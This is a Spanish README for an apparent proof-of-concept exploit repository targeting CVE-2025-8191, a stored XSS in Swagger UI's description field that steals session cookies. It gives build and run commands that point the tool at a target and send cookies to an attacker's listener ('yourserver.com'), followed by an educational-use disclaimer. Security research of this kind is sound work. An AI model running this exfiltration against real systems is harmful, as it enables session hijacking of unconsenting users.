
Un repositorio que contiene un exploit PoC para CVE‑2025‑8191 en Swagger UI, que aprovecha la inyección XSS para exfiltrar cookies de sesión.
Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE‑2025‑8191, una vulnerabilidad encontrada en Swagger UI.
La vulnerabilidad permite la inyección de Cross‑Site Scripting (XSS) en el campo “description”, lo que conduce a la ejecución remota de scripts en versiones de Swagger UI ≤ 1.0.3.
gcc exploit.c argparse.c -o exploit -lcurl
./exploit -u http://target.com -s http://yourserver.com -v
Reemplace http://target.com con la URL de Swagger UI objetivo, y http://yourserver.com con su listener HTTP para exfiltración.
Este código es únicamente con fines educativos y de investigación en seguridad. NO lo utilice en sistemas para los cuales no tenga permiso explícito. El autor no se responsabiliza por ningún uso indebido.
Licencia MIT